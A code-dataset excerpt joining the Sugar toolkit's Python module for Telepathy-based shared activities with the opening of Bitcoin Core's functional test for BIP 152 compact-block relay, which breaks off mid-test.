# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import controllers
import models
|
godiard/sugar-toolkit-gtk3 | refs/heads/master | src/sugar3/presence/activity.py | 6 | # Copyright (C) 2007, Red Hat, Inc.
# Copyright (C) 2010 Collabora Ltd. <http://www.collabora.co.uk/>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""UI interface to an activity in the presence service
STABLE.
"""
import logging
from functools import partial
import dbus
from dbus import PROPERTIES_IFACE
from gi.repository import GObject
from telepathy.client import Channel
from telepathy.interfaces import CHANNEL, \
CHANNEL_INTERFACE_GROUP, \
CHANNEL_TYPE_TUBES, \
CHANNEL_TYPE_TEXT, \
CONNECTION, \
PROPERTIES_INTERFACE
from telepathy.constants import CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES, \
HANDLE_TYPE_ROOM, \
HANDLE_TYPE_CONTACT, \
PROPERTY_FLAG_WRITE
from sugar3.presence.buddy import Buddy
CONN_INTERFACE_ACTIVITY_PROPERTIES = 'org.laptop.Telepathy.ActivityProperties'
CONN_INTERFACE_BUDDY_INFO = 'org.laptop.Telepathy.BuddyInfo'
CONN_INTERFACE_ROOM_CONFIG = \
'org.freedesktop.Telepathy.Channel.Interface.RoomConfig1'
_logger = logging.getLogger('sugar3.presence.activity')
class Activity(GObject.GObject):
"""UI interface for an Activity in the presence service
Activities in the presence service represent your and other user's
shared activities.
Properties:
id
color
name
type
joined
"""
__gsignals__ = {
'buddy-joined': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'buddy-left': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'new-channel': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT])),
'joined': (GObject.SignalFlags.RUN_FIRST, None,
([GObject.TYPE_PYOBJECT, GObject.TYPE_PYOBJECT])),
}
__gproperties__ = {
'id': (str, None, None, None, GObject.PARAM_READABLE),
'name': (str, None, None, None, GObject.PARAM_READWRITE),
'tags': (str, None, None, None, GObject.PARAM_READWRITE),
'color': (str, None, None, None, GObject.PARAM_READWRITE),
'type': (str, None, None, None, GObject.PARAM_READABLE),
'private': (bool, None, None, True, GObject.PARAM_READWRITE),
'joined': (bool, None, None, False, GObject.PARAM_READABLE),
}
def __init__(self, account_path, connection, room_handle=None,
properties=None):
if room_handle is None and properties is None:
raise ValueError('Need to pass one of room_handle or properties')
if properties is None:
properties = {}
GObject.GObject.__init__(self)
self._account_path = account_path
self.telepathy_conn = connection
self.telepathy_text_chan = None
self.telepathy_tubes_chan = None
self.room_handle = room_handle
self._join_command = None
self._share_command = None
self._id = properties.get('id', None)
self._color = properties.get('color', None)
self._name = properties.get('name', None)
self._type = properties.get('type', None)
self._tags = properties.get('tags', None)
self._private = properties.get('private', True)
self._joined = properties.get('joined', False)
self._channel_self_handle = None
self._text_channel_group_flags = 0
self._buddies = {}
self._joined_buddies = {}
self._get_properties_call = None
if self.room_handle is not None:
self._start_tracking_properties()
def _start_tracking_properties(self):
bus = dbus.SessionBus()
self._get_properties_call = bus.call_async(
self.telepathy_conn.requested_bus_name,
self.telepathy_conn.object_path,
CONN_INTERFACE_ACTIVITY_PROPERTIES,
'GetProperties',
'u',
(self.room_handle,),
reply_handler=self.__got_properties_cb,
error_handler=self.__error_handler_cb,
utf8_strings=True)
# As only one Activity instance is needed per activity process,
# we can afford listening to ActivityPropertiesChanged like this.
self.telepathy_conn.connect_to_signal(
'ActivityPropertiesChanged',
self.__activity_properties_changed_cb,
dbus_interface=CONN_INTERFACE_ACTIVITY_PROPERTIES)
def __activity_properties_changed_cb(self, room_handle, properties):
_logger.debug('%r: Activity properties changed to %r' % (self,
properties))
self._update_properties(properties)
def __got_properties_cb(self, properties):
_logger.debug('__got_properties_cb %r' % properties)
self._get_properties_call = None
self._update_properties(properties)
def __error_handler_cb(self, error):
_logger.debug('__error_handler_cb %r' % error)
def _update_properties(self, new_props):
val = new_props.get('name', self._name)
if isinstance(val, str) and val != self._name:
self._name = val
self.notify('name')
val = new_props.get('tags', self._tags)
if isinstance(val, str) and val != self._tags:
self._tags = val
self.notify('tags')
val = new_props.get('color', self._color)
if isinstance(val, str) and val != self._color:
self._color = val
self.notify('color')
val = bool(new_props.get('private', self._private))
if val != self._private:
self._private = val
self.notify('private')
val = new_props.get('id', self._id)
if isinstance(val, str) and self._id is None:
self._id = val
self.notify('id')
val = new_props.get('type', self._type)
if isinstance(val, str) and self._type is None:
self._type = val
self.notify('type')
def object_path(self):
"""Get our dbus object path"""
return self._object_path
def do_get_property(self, pspec):
"""Retrieve a particular property from our property dictionary"""
if pspec.name == 'joined':
return self._joined
if self._get_properties_call is not None:
_logger.debug('%r: Blocking on GetProperties() because someone '
'wants property %s' % (self, pspec.name))
self._get_properties_call.block()
if pspec.name == 'id':
return self._id
elif pspec.name == 'name':
return self._name
elif pspec.name == 'color':
return self._color
elif pspec.name == 'type':
return self._type
elif pspec.name == 'tags':
return self._tags
elif pspec.name == 'private':
return self._private
def do_set_property(self, pspec, val):
"""Set a particular property in our property dictionary"""
# FIXME: need an asynchronous API to set these properties,
# particularly 'private'
if pspec.name == 'name':
self._name = val
elif pspec.name == 'color':
self._color = val
elif pspec.name == 'tags':
self._tags = val
elif pspec.name == 'private':
self._private = val
else:
raise ValueError('Unknown property %r' % pspec.name)
self._publish_properties()
def set_private(self, val, reply_handler, error_handler):
_logger.debug('set_private %r' % val)
        self.telepathy_conn.SetProperties(
            self.room_handle, {'private': bool(val)},
            dbus_interface=CONN_INTERFACE_ACTIVITY_PROPERTIES,
            reply_handler=reply_handler,
            error_handler=error_handler)
def get_joined_buddies(self):
"""Retrieve the set of Buddy objects attached to this activity
returns list of presence Buddy objects that we can successfully
create from the buddy object paths that PS has for this activity.
"""
return self._joined_buddies.values()
def get_buddy_by_handle(self, handle):
"""Retrieve the Buddy object given a telepathy handle.
buddy object paths are cached in self._handle_to_buddy_path,
so we can get the buddy without calling PS.
"""
object_path = self._handle_to_buddy_path.get(handle, None)
if object_path:
buddy = self._ps_new_object(object_path)
return buddy
return None
def invite(self, buddy, message, response_cb):
"""Invite the given buddy to join this activity.
The callback will be called with one parameter: None on success,
or an exception on failure.
"""
if not self._joined:
raise RuntimeError('Cannot invite a buddy to an activity that is'
'not shared.')
self.telepathy_text_chan.AddMembers(
[buddy.contact_handle], message,
dbus_interface=CHANNEL_INTERFACE_GROUP,
reply_handler=partial(
self.__invite_cb, response_cb),
error_handler=partial(self.__invite_cb, response_cb))
def __invite_cb(self, response_cb, error=None):
response_cb(error)
def set_up_tubes(self, reply_handler, error_handler):
raise NotImplementedError()
def __joined_cb(self, join_command, error):
_logger.debug('%r: Join finished %r' % (self, error))
if error is not None:
            self.emit('joined', error is None, str(error))
            return
self.telepathy_text_chan = join_command.text_channel
self.telepathy_tubes_chan = join_command.tubes_channel
self._channel_self_handle = join_command.channel_self_handle
self._text_channel_group_flags = join_command.text_channel_group_flags
self._start_tracking_buddies()
self._start_tracking_channel()
def _start_tracking_buddies(self):
group = self.telepathy_text_chan[CHANNEL_INTERFACE_GROUP]
group.GetAllMembers(reply_handler=self.__get_all_members_cb,
error_handler=self.__error_handler_cb)
group.connect_to_signal('MembersChanged',
self.__text_channel_members_changed_cb)
def _start_tracking_channel(self):
channel = self.telepathy_text_chan[CHANNEL]
channel.connect_to_signal('Closed', self.__text_channel_closed_cb)
def __get_all_members_cb(self, members, local_pending, remote_pending):
_logger.debug('__get_all_members_cb %r %r' % (members,
self._text_channel_group_flags))
if self._channel_self_handle in members:
members.remove(self._channel_self_handle)
if not members:
return
self._resolve_handles(members, reply_cb=self._add_initial_buddies)
def _resolve_handles(self, input_handles, reply_cb):
def get_handle_owners_cb(handles):
self.telepathy_conn.InspectHandles(
HANDLE_TYPE_CONTACT, handles,
reply_handler=reply_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
if self._text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
group = self.telepathy_text_chan[CHANNEL_INTERFACE_GROUP]
group.GetHandleOwners(input_handles,
reply_handler=get_handle_owners_cb,
error_handler=self.__error_handler_cb)
else:
get_handle_owners_cb(input_handles)
def _add_initial_buddies(self, contact_ids):
_logger.debug('__add_initial_buddies %r' % contact_ids)
for contact_id in contact_ids:
self._buddies[contact_id] = self._get_buddy(contact_id)
self._joined_buddies[contact_id] = self._get_buddy(contact_id)
# Once we have the initial members, we can finish the join process
self._joined = True
self.emit('joined', True, None)
def __text_channel_members_changed_cb(self, message, added, removed,
local_pending, remote_pending,
actor, reason):
        _logger.debug('__text_channel_members_changed_cb %r' %
                      [message, added, removed, local_pending,
                       remote_pending, actor, reason])
if self._channel_self_handle in added:
added.remove(self._channel_self_handle)
if added:
self._resolve_handles(added, reply_cb=self._add_buddies)
if self._channel_self_handle in removed:
removed.remove(self._channel_self_handle)
if removed:
self._resolve_handles(removed, reply_cb=self._remove_buddies)
def _add_buddies(self, contact_ids):
for contact_id in contact_ids:
if contact_id not in self._buddies:
buddy = self._get_buddy(contact_id)
self.emit('buddy-joined', buddy)
self._buddies[contact_id] = buddy
if contact_id not in self._joined_buddies:
self._joined_buddies[contact_id] = buddy
def _remove_buddies(self, contact_ids):
for contact_id in contact_ids:
if contact_id in self._buddies:
buddy = self._get_buddy(contact_id)
self.emit('buddy-left', buddy)
del self._buddies[contact_id]
def _get_buddy(self, contact_id):
if contact_id in self._buddies:
return self._buddies[contact_id]
else:
return Buddy(self._account_path, contact_id)
def join(self):
"""Join this activity.
Emits 'joined' and otherwise does nothing if we're already joined.
"""
if self._join_command is not None:
return
if self._joined:
self.emit('joined', True, None)
return
_logger.debug('%r: joining' % self)
self._join_command = _JoinCommand(self.telepathy_conn,
self.room_handle)
self._join_command.connect('finished', self.__joined_cb)
self._join_command.run()
def share(self, share_activity_cb, share_activity_error_cb):
if self.room_handle is not None:
raise ValueError('Already have a room handle')
self._share_command = _ShareCommand(self.telepathy_conn, self._id)
self._share_command.connect('finished',
partial(self.__shared_cb,
share_activity_cb,
share_activity_error_cb))
self._share_command.run()
def __shared_cb(self, share_activity_cb, share_activity_error_cb,
share_command, error):
_logger.debug('%r: Share finished %r' % (self, error))
if error is None:
self._joined = True
self.room_handle = share_command.room_handle
self.telepathy_text_chan = share_command.text_channel
self.telepathy_tubes_chan = share_command.tubes_channel
self._channel_self_handle = share_command.channel_self_handle
self._text_channel_group_flags = \
share_command.text_channel_group_flags
self._publish_properties()
self._start_tracking_properties()
self._start_tracking_buddies()
self._start_tracking_channel()
share_activity_cb(self)
else:
share_activity_error_cb(self, error)
def _publish_properties(self):
properties = {}
if self._color is not None:
properties['color'] = str(self._color)
if self._name is not None:
properties['name'] = str(self._name)
if self._type is not None:
properties['type'] = self._type
if self._tags is not None:
properties['tags'] = self._tags
properties['private'] = self._private
self.telepathy_conn.SetProperties(
self.room_handle,
properties,
dbus_interface=CONN_INTERFACE_ACTIVITY_PROPERTIES)
def __share_error_cb(self, share_activity_error_cb, error):
logging.debug('%r: Share failed because: %s' % (self, error))
share_activity_error_cb(self, error)
# GetChannels() wrapper
def get_channels(self):
"""Retrieve communications channel descriptions for the activity
Returns a tuple containing:
- the D-Bus well-known service name of the connection
(FIXME: this is redundant; in Telepathy it can be derived
from that of the connection)
- the D-Bus object path of the connection
- a list of D-Bus object paths representing the channels
associated with this activity
"""
bus_name = self.telepathy_conn.requested_bus_name
connection_path = self.telepathy_conn.object_path
channels = [self.telepathy_text_chan.object_path,
self.telepathy_tubes_chan.object_path]
_logger.debug('%r: bus name is %s, connection is %s, channels are %r' %
(self, bus_name, connection_path, channels))
return bus_name, connection_path, channels
# Leaving
def __text_channel_closed_cb(self):
self._joined = False
self.emit('joined', False, 'left activity')
def leave(self):
"""Leave this shared activity"""
_logger.debug('%r: leaving' % self)
self.telepathy_text_chan.Close()
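# A minimal usage sketch (illustrative only, not used elsewhere in this
# module): joining an existing shared activity and logging membership
# changes. It assumes the caller already has a valid Telepathy account path,
# connection and room handle.
def _example_join_activity(account_path, connection, room_handle):
    activity = Activity(account_path, connection, room_handle=room_handle)
    def joined_cb(activity_, success, error):
        _logger.debug('example join finished: success=%r error=%r' %
                      (success, error))
    activity.connect('joined', joined_cb)
    activity.connect('buddy-joined',
                     lambda activity_, buddy:
                     _logger.debug('example buddy joined: %r' % buddy))
    activity.join()
    return activity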
class _BaseCommand(GObject.GObject):
__gsignals__ = {
'finished': (GObject.SignalFlags.RUN_FIRST, None,
([object])),
}
def __init__(self):
GObject.GObject.__init__(self)
self.text_channel = None
self.text_channel_group_flags = None
self.tubes_channel = None
self.room_handle = None
self.channel_self_handle = None
def run(self):
raise NotImplementedError()
class _ShareCommand(_BaseCommand):
def __init__(self, connection, activity_id):
_BaseCommand.__init__(self)
self._connection = connection
self._activity_id = activity_id
self._finished = False
self._join_command = None
def run(self):
self._connection.RequestHandles(
HANDLE_TYPE_ROOM,
[self._activity_id],
reply_handler=self.__got_handles_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
def __got_handles_cb(self, handles):
logging.debug('__got_handles_cb %r' % handles)
self.room_handle = handles[0]
self._join_command = _JoinCommand(self._connection, self.room_handle)
self._join_command.connect('finished', self.__joined_cb)
self._join_command.run()
def __joined_cb(self, join_command, error):
_logger.debug('%r: Join finished %r' % (self, error))
if error is not None:
self._finished = True
self.emit('finished', error)
return
self.text_channel = join_command.text_channel
self.text_channel_group_flags = join_command.text_channel_group_flags
self.tubes_channel = join_command.tubes_channel
self.channel_self_handle = join_command.channel_self_handle
self._connection.AddActivity(
self._activity_id,
self.room_handle,
reply_handler=self.__added_activity_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONN_INTERFACE_BUDDY_INFO)
def __added_activity_cb(self):
self._finished = True
self.emit('finished', None)
def __error_handler_cb(self, error):
self._finished = True
self.emit('finished', error)
class _JoinCommand(_BaseCommand):
def __init__(self, connection, room_handle):
_BaseCommand.__init__(self)
self._connection = connection
self._finished = False
self.room_handle = room_handle
self._global_self_handle = None
def run(self):
if self._finished:
raise RuntimeError('This command has already finished')
self._connection.Get(CONNECTION, 'SelfHandle',
reply_handler=self.__get_self_handle_cb,
error_handler=self.__error_handler_cb,
dbus_interface=PROPERTIES_IFACE)
def __get_self_handle_cb(self, handle):
self._global_self_handle = handle
self._connection.RequestChannel(
CHANNEL_TYPE_TEXT,
HANDLE_TYPE_ROOM,
self.room_handle, True,
reply_handler=self.__create_text_channel_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
self._connection.RequestChannel(
CHANNEL_TYPE_TUBES,
HANDLE_TYPE_ROOM,
self.room_handle,
True,
reply_handler=self.__create_tubes_channel_cb,
error_handler=self.__error_handler_cb,
dbus_interface=CONNECTION)
def __create_text_channel_cb(self, channel_path):
Channel(self._connection.requested_bus_name, channel_path,
ready_handler=self.__text_channel_ready_cb)
def __create_tubes_channel_cb(self, channel_path):
Channel(self._connection.requested_bus_name, channel_path,
ready_handler=self.__tubes_channel_ready_cb)
def __error_handler_cb(self, error):
self._finished = True
self.emit('finished', error)
def __tubes_channel_ready_cb(self, channel):
_logger.debug('%r: Tubes channel %r is ready' % (self, channel))
self.tubes_channel = channel
self._tubes_ready()
def __text_channel_ready_cb(self, channel):
_logger.debug('%r: Text channel %r is ready' % (self, channel))
self.text_channel = channel
self._tubes_ready()
def _tubes_ready(self):
if self.text_channel is None or \
self.tubes_channel is None:
return
_logger.debug('%r: finished setting up tubes' % self)
self._add_self_to_channel()
def __text_channel_group_flags_changed_cb(self, added, removed):
_logger.debug('__text_channel_group_flags_changed_cb %r %r' % (added,
removed))
self.text_channel_group_flags |= added
self.text_channel_group_flags &= ~removed
def _add_self_to_channel(self):
# FIXME: cope with non-Group channels here if we want to support
# non-OLPC-compatible IMs
group = self.text_channel[CHANNEL_INTERFACE_GROUP]
def got_all_members(members, local_pending, remote_pending):
_logger.debug('got_all_members members %r local_pending %r '
'remote_pending %r' % (members, local_pending,
remote_pending))
if self.text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
self_handle = self.channel_self_handle
else:
self_handle = self._global_self_handle
if self_handle in local_pending:
_logger.debug('%r: We are in local pending - entering' % self)
group.AddMembers([self_handle], '',
reply_handler=lambda: None,
error_handler=lambda e: self._join_failed_cb(
e, 'got_all_members AddMembers'))
if members:
self.__text_channel_members_changed_cb('', members, (),
(), (), 0, 0)
def got_group_flags(flags):
self.text_channel_group_flags = flags
# by the time we hook this, we need to know the group flags
group.connect_to_signal('MembersChanged',
self.__text_channel_members_changed_cb)
# bootstrap by getting the current state. This is where we find
# out whether anyone was lying to us in their PEP info
group.GetAllMembers(reply_handler=got_all_members,
error_handler=self.__error_handler_cb)
def got_self_handle(channel_self_handle):
self.channel_self_handle = channel_self_handle
group.connect_to_signal('GroupFlagsChanged',
self.__text_channel_group_flags_changed_cb)
group.GetGroupFlags(reply_handler=got_group_flags,
error_handler=self.__error_handler_cb)
group.GetSelfHandle(reply_handler=got_self_handle,
error_handler=self.__error_handler_cb)
def __text_channel_members_changed_cb(self, message, added, removed,
local_pending, remote_pending,
actor, reason):
_logger.debug('__text_channel_members_changed_cb added %r removed %r '
'local_pending %r remote_pending %r channel_self_handle '
'%r' % (added, removed, local_pending, remote_pending,
self.channel_self_handle))
if self.text_channel_group_flags & \
CHANNEL_GROUP_FLAG_CHANNEL_SPECIFIC_HANDLES:
self_handle = self.channel_self_handle
else:
self_handle = self._global_self_handle
if self_handle not in added:
return
# Use RoomConfig1 to configure the text channel. If this
# doesn't exist, fall-back on old-style PROPERTIES_INTERFACE.
if CONN_INTERFACE_ROOM_CONFIG in self.text_channel:
self.__update_room_config()
elif PROPERTIES_INTERFACE in self.text_channel:
self.text_channel[PROPERTIES_INTERFACE].ListProperties(
reply_handler=self.__list_properties_cb,
error_handler=self.__error_handler_cb)
else:
# FIXME: when does this codepath get hit?
# It could be related to no property configuration being available
# in the selected backend, or it could be called at some stage
# of the protocol when properties aren't available yet.
self._finished = True
self.emit('finished', None)
def __update_room_config(self):
# FIXME: invite-only ought to be set on private activities; but
# since only the owner can change invite-only, that would break
# activity scope changes.
props = {
# otherwise buddy resolution breaks
'Anonymous': False,
# anyone who knows about the channel can join
'InviteOnly': False,
# vanish when there are no members
'Persistent': False,
# don't appear in server room lists
'Private': True,
}
room_cfg = self.text_channel[CONN_INTERFACE_ROOM_CONFIG]
room_cfg.UpdateConfiguration(props,
reply_handler=self.__room_cfg_updated_cb,
error_handler=self.__room_cfg_error_cb)
def __room_cfg_updated_cb(self):
self._finished = True
self.emit('finished', None)
def __room_cfg_error_cb(self, error):
# If RoomConfig update fails, it's probably because we don't have
# permission (e.g. we are not the session initiator). Thats OK -
# ignore the failure and carry on.
if (error.get_dbus_name() !=
'org.freedesktop.Telepathy.Error.PermissionDenied'):
logging.error("Error setting room configuration: %s", error)
self._finished = True
self.emit('finished', None)
def __list_properties_cb(self, prop_specs):
# FIXME: invite-only ought to be set on private activities; but
# since only the owner can change invite-only, that would break
# activity scope changes.
props = {
# otherwise buddy resolution breaks
'anonymous': False,
# anyone who knows about the channel can join
'invite-only': False,
# so non-owners can invite others
'invite-restricted': False,
# vanish when there are no members
'persistent': False,
# don't appear in server room lists
'private': True,
}
props_to_set = []
for ident, name, sig_, flags in prop_specs:
value = props.pop(name, None)
if value is not None:
if flags & PROPERTY_FLAG_WRITE:
props_to_set.append((ident, value))
# FIXME: else error, but only if we're creating the room?
# FIXME: if props is nonempty, then we want to set props that aren't
# supported here - raise an error?
if props_to_set:
self.text_channel[PROPERTIES_INTERFACE].SetProperties(
props_to_set, reply_handler=self.__set_properties_cb,
error_handler=self.__error_handler_cb)
else:
self._finished = True
self.emit('finished', None)
def __set_properties_cb(self):
self._finished = True
self.emit('finished', None)
|
gmaxwell/bitcoin | refs/heads/master | test/functional/p2p-compactblocks.py | 7 | #!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test compact blocks (BIP 152).
Version 1 compact blocks are pre-segwit (txids)
Version 2 compact blocks are post-segwit (wtxids)
"""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.blocktools import create_block, create_coinbase, add_witness_commitment
from test_framework.script import CScript, OP_TRUE
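# Illustrative helper (not used by the tests below): per the BIP 152 versions
# described in the module docstring, a version-1 compact-block peer matches
# transactions by txid while a version-2 (segwit-aware) peer matches by wtxid.
# Assuming a framework CTransaction whose sha256 field has been populated via
# calc_sha256(), the identifier each version would short-hash is:
def _cb_tx_identifier(tx, version):
    return tx.calc_sha256(True) if version == 2 else tx.sha256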
# TestNode: A peer we use to send messages to bitcoind, and store responses.
class TestNode(NodeConnCB):
def __init__(self):
super().__init__()
self.last_sendcmpct = []
self.block_announced = False
# Store the hashes of blocks we've seen announced.
# This is for synchronizing the p2p message traffic,
# so we can eg wait until a particular block is announced.
self.announced_blockhashes = set()
def on_sendcmpct(self, conn, message):
self.last_sendcmpct.append(message)
def on_cmpctblock(self, conn, message):
self.block_announced = True
self.last_message["cmpctblock"].header_and_shortids.header.calc_sha256()
self.announced_blockhashes.add(self.last_message["cmpctblock"].header_and_shortids.header.sha256)
def on_headers(self, conn, message):
self.block_announced = True
for x in self.last_message["headers"].headers:
x.calc_sha256()
self.announced_blockhashes.add(x.sha256)
def on_inv(self, conn, message):
for x in self.last_message["inv"].inv:
if x.type == 2:
self.block_announced = True
self.announced_blockhashes.add(x.hash)
# Requires caller to hold mininode_lock
def received_block_announcement(self):
return self.block_announced
def clear_block_announcement(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.last_message.pop("cmpctblock", None)
def get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.connection.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def request_headers_and_sync(self, locator, hashstop=0):
self.clear_block_announcement()
self.get_headers(locator, hashstop)
wait_until(self.received_block_announcement, timeout=30, lock=mininode_lock)
self.clear_block_announcement()
# Block until a block announcement for a particular block hash is
# received.
def wait_for_block_announcement(self, block_hash, timeout=30):
def received_hash():
return (block_hash in self.announced_blockhashes)
wait_until(received_hash, timeout=timeout, lock=mininode_lock)
def send_await_disconnect(self, message, timeout=30):
"""Sends a message to the node and wait for disconnect.
This is used when we want to send a message into the node that we expect
will get us disconnected, eg an invalid block."""
self.send_message(message)
wait_until(lambda: not self.connected, timeout=timeout, lock=mininode_lock)
class CompactBlocksTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
# Node0 = pre-segwit, node1 = segwit-aware
self.num_nodes = 2
self.extra_args = [["-vbparams=segwit:0:0"], ["-txindex"]]
self.utxos = []
def build_block_on_tip(self, node, segwit=False):
height = node.getblockcount()
tip = node.getbestblockhash()
mtp = node.getblockheader(tip)['mediantime']
block = create_block(int(tip, 16), create_coinbase(height + 1), mtp + 1)
block.nVersion = 4
if segwit:
add_witness_commitment(block)
block.solve()
return block
# Create 10 more anyone-can-spend utxo's for testing.
def make_utxos(self):
# Doesn't matter which node we use, just use node0.
block = self.build_block_on_tip(self.nodes[0])
self.test_node.send_and_ping(msg_block(block))
assert(int(self.nodes[0].getbestblockhash(), 16) == block.sha256)
self.nodes[0].generate(100)
total_value = block.vtx[0].vout[0].nValue
out_value = total_value // 10
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(block.vtx[0].sha256, 0), b''))
for i in range(10):
tx.vout.append(CTxOut(out_value, CScript([OP_TRUE])))
tx.rehash()
block2 = self.build_block_on_tip(self.nodes[0])
block2.vtx.append(tx)
block2.hashMerkleRoot = block2.calc_merkle_root()
block2.solve()
self.test_node.send_and_ping(msg_block(block2))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block2.sha256)
self.utxos.extend([[tx.sha256, i, out_value] for i in range(10)])
return
# Test "sendcmpct" (between peers preferring the same version):
# - No compact block announcements unless sendcmpct is sent.
# - If sendcmpct is sent with version > preferred_version, the message is ignored.
# - If sendcmpct is sent with boolean 0, then block announcements are not
# made with compact blocks.
# - If sendcmpct is then sent with boolean 1, then new block announcements
# are made with compact blocks.
# If old_node is passed in, request compact blocks with version=preferred-1
# and verify that it receives block announcements via compact block.
def test_sendcmpct(self, node, test_node, preferred_version, old_node=None):
# Make sure we get a SENDCMPCT message from our peer
def received_sendcmpct():
return (len(test_node.last_sendcmpct) > 0)
wait_until(received_sendcmpct, timeout=30, lock=mininode_lock)
with mininode_lock:
# Check that the first version received is the preferred one
assert_equal(test_node.last_sendcmpct[0].version, preferred_version)
# And that we receive versions down to 1.
assert_equal(test_node.last_sendcmpct[-1].version, 1)
test_node.last_sendcmpct = []
tip = int(node.getbestblockhash(), 16)
def check_announcement_of_new_block(node, peer, predicate):
peer.clear_block_announcement()
block_hash = int(node.generate(1)[0], 16)
peer.wait_for_block_announcement(block_hash, timeout=30)
assert(peer.block_announced)
with mininode_lock:
assert predicate(peer), (
"block_hash={!r}, cmpctblock={!r}, inv={!r}".format(
block_hash, peer.last_message.get("cmpctblock", None), peer.last_message.get("inv", None)))
# We shouldn't get any block announcements via cmpctblock yet.
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Try one more time, this time after requesting headers.
test_node.request_headers_and_sync(locator=[tip])
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message and "inv" in p.last_message)
# Test a few ways of using sendcmpct that should NOT
# result in compact block announcements.
# Before each test, sync the headers chain.
test_node.request_headers_and_sync(locator=[tip])
# Now try a SENDCMPCT message with too-high version
sendcmpct = msg_sendcmpct()
sendcmpct.version = preferred_version+1
sendcmpct.announce = True
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Headers sync before next test.
test_node.request_headers_and_sync(locator=[tip])
# Now try a SENDCMPCT message with valid version, but announce=False
sendcmpct.version = preferred_version
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message)
# Headers sync before next test.
test_node.request_headers_and_sync(locator=[tip])
# Finally, try a SENDCMPCT message with announce=True
sendcmpct.version = preferred_version
sendcmpct.announce = True
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time (no headers sync should be needed!)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time, after turning on sendheaders
test_node.send_and_ping(msg_sendheaders())
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Try one more time, after sending a version-1, announce=false message.
sendcmpct.version = preferred_version-1
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" in p.last_message)
# Now turn off announcements
sendcmpct.version = preferred_version
sendcmpct.announce = False
test_node.send_and_ping(sendcmpct)
check_announcement_of_new_block(node, test_node, lambda p: "cmpctblock" not in p.last_message and "headers" in p.last_message)
if old_node is not None:
# Verify that a peer using an older protocol version can receive
# announcements from this node.
sendcmpct.version = preferred_version-1
sendcmpct.announce = True
old_node.send_and_ping(sendcmpct)
# Header sync
old_node.request_headers_and_sync(locator=[tip])
check_announcement_of_new_block(node, old_node, lambda p: "cmpctblock" in p.last_message)
# This test actually causes bitcoind to (reasonably!) disconnect us, so do this last.
def test_invalid_cmpctblock_message(self):
self.nodes[0].generate(101)
block = self.build_block_on_tip(self.nodes[0])
cmpct_block = P2PHeaderAndShortIDs()
cmpct_block.header = CBlockHeader(block)
cmpct_block.prefilled_txn_length = 1
# This index will be too high
prefilled_txn = PrefilledTransaction(1, block.vtx[0])
cmpct_block.prefilled_txn = [prefilled_txn]
self.test_node.send_await_disconnect(msg_cmpctblock(cmpct_block))
assert_equal(int(self.nodes[0].getbestblockhash(), 16), block.hashPrevBlock)
# Compare the generated shortids to what we expect based on BIP 152, given
# bitcoind's choice of nonce.
def test_compactblock_construction(self, node, test_node, version, use_witness_address):
# Generate a bunch of transactions.
node.generate(101)
num_transactions = 25
address = node.getnewaddress()
if use_witness_address:
# Want at least one segwit spend, so move all funds to
# a witness address.
address = node.addwitnessaddress(address)
value_to_send = node.getbalance()
node.sendtoaddress(address, satoshi_round(value_to_send-Decimal(0.1)))
node.generate(1)
segwit_tx_generated = False
for i in range(num_transactions):
txid = node.sendtoaddress(address, 0.1)
hex_tx = node.gettransaction(txid)["hex"]
tx = FromHex(CTransaction(), hex_tx)
if not tx.wit.is_null():
segwit_tx_generated = True
if use_witness_address:
assert(segwit_tx_generated) # check that our test is not broken
# Wait until we've seen the block announcement for the resulting tip
tip = int(node.getbestblockhash(), 16)
test_node.wait_for_block_announcement(tip)
# Make sure we will receive a fast-announce compact block
self.request_cb_announcements(test_node, node, version)
# Now mine a block, and look at the resulting compact block.
test_node.clear_block_announcement()
